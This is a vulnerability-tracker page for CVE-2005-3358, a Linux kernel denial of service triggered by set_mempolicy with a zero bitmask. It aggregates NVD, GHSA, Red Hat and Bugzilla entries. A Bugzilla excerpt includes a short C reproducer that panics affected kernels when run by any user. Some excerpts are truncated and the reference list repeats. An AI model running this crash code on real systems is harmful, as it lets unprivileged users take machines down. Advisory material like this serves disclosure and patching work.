CVE-2005-3358
published 2005-12-14CVE-2005-3358: Linux kernel before 2.6.15 allows local users to cause a denial of service (panic) via a set_mempolicy call with a 0 bitmask, which causes a panic when a page…
PriorityP414medium4.9CVSS 2.0
AVLACLAuNCNINAC
EXPLOIT
EPSS
1.01%
58.9th percentile
Linux kernel before 2.6.15 allows local users to cause a denial of service (panic) via a set_mempolicy call with a 0 bitmask, which causes a panic when a page fault occurs.
Affected
45 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | <= 2.6.14.7 | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvdv2.04.9MEDIUMAV:L/AC:L/Au:N/C:N/I:N/A:C
vendor_redhat4.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wh6f-4x45-xjrj: Linux kernel before 2
ghsa_unreviewed·2022-05-01
CVE-2005-3358 [MEDIUM] GHSA-wh6f-4x45-xjrj: Linux kernel before 2
Linux kernel before 2.6.15 allows local users to cause a denial of service (panic) via a set_mempolicy call with a 0 bitmask, which causes a panic when a page fault occurs.
Red Hat
security flaw
vendor_redhat·2005-12-13·CVSS 4.9
CVE-2005-3358 [MEDIUM] security flaw
security flaw
Linux kernel before 2.6.15 allows local users to cause a denial of service (panic) via a set_mempolicy call with a 0 bitmask, which causes a panic when a page fault occurs.
No detection rules found.
Bugzilla
CVE-2005-3358 security flaw
bugzilla·2018-08-16·CVSS 4.9
CVE-2005-3358 [MEDIUM] CVE-2005-3358 security flaw
CVE-2005-3358 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Linux kernel before 2.6.15 allows local users to cause a denial of service (panic) via a set_mempolicy call with a 0 bitmask, which causes a panic when a page fault occurs.
Bugzilla
CVE-2005-3358 panic caused by bad args to set_mempolicy
bugzilla·2005-12-13·CVSS 4.9
CVE-2005-3358 [MEDIUM] CVE-2005-3358 panic caused by bad args to set_mempolicy
CVE-2005-3358 panic caused by bad args to set_mempolicy
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050719 Red Hat/1.0.6-1.4.1 Firefox/1.0.6
Description of problem:
Note: since this is easly reproduced by an untrusted user I am flagging this as a security issue.
Passing a 0 bitmask to set_mempolicy will cause a panic later on when a page fault is triggered. This panic can be triggered by ANY USER. I have only tested this on ia64 however I do not believe this is platform specific. I do expect however that it will only affect platforms where CONFIG_NUMA is set.
The following code will reproduce the panic on ia64 when run as any user.
#include
main(){
syscall(__NR_set_mempolicy,3,0,0);
write(1,10,8192);
}
This will cause the panic:
kerne
Bugzilla
Multiple Kernel vulnerabilities
bugzilla·2005-05-11
[MEDIUM] Multiple Kernel vulnerabilities
Multiple Kernel vulnerabilities
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Mozilla rulez!)
Description of problem:
Paul Starzetz of iSEC has found yet another bug in binfmt_elf.c. It can be abused to crash the kernel, perhaps even to break into the kernel land. See the advisory for details.
Version-Release number of selected component (if applicable):
How reproducible:
Didn't try
Steps to Reproduce:
Additional info:
I've got a quick and dirty patch. I'll submit it ASAP.
Discussion:
Grr...Bugzilla assigned the bug to [email protected] rather than to
[email protected]
---
Created attachment 114264
The patch for CAN-2005-1263
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
This patch can be applied to FL kernel 2.4.20-43:
402e548b02382c015d6f5e5704370a1ba546598b
li
http://linux.bkbits.net:8080/linux-2.6/cset%4042307e9fp8ihEMrfaoPMp_agDevQNAhttp://lists.suse.de/archive/suse-security-announce/2006-Feb/0010.htmlhttp://secunia.com/advisories/18216http://secunia.com/advisories/18510http://secunia.com/advisories/18788http://secunia.com/advisories/19038http://secunia.com/advisories/19374http://securitytracker.com/id?1015433http://www.debian.org/security/2006/dsa-1017http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.15http://www.novell.com/linux/security/advisories/2006_06_kernel.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0101.htmlhttp://www.securityfocus.com/archive/1/427980/100/0/threadedhttp://www.securityfocus.com/archive/1/427981/100/0/threadedhttp://www.securityfocus.com/bid/16135http://www.vupen.com/english/advisories/2006/0035https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175683https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10410http://linux.bkbits.net:8080/linux-2.6/cset%4042307e9fp8ihEMrfaoPMp_agDevQNAhttp://lists.suse.de/archive/suse-security-announce/2006-Feb/0010.htmlhttp://secunia.com/advisories/18216http://secunia.com/advisories/18510http://secunia.com/advisories/18788http://secunia.com/advisories/19038http://secunia.com/advisories/19374http://securitytracker.com/id?1015433http://www.debian.org/security/2006/dsa-1017http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.15http://www.novell.com/linux/security/advisories/2006_06_kernel.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0101.htmlhttp://www.securityfocus.com/archive/1/427980/100/0/threadedhttp://www.securityfocus.com/archive/1/427981/100/0/threadedhttp://www.securityfocus.com/bid/16135http://www.vupen.com/english/advisories/2006/0035https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175683https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10410
2005-12-14
Published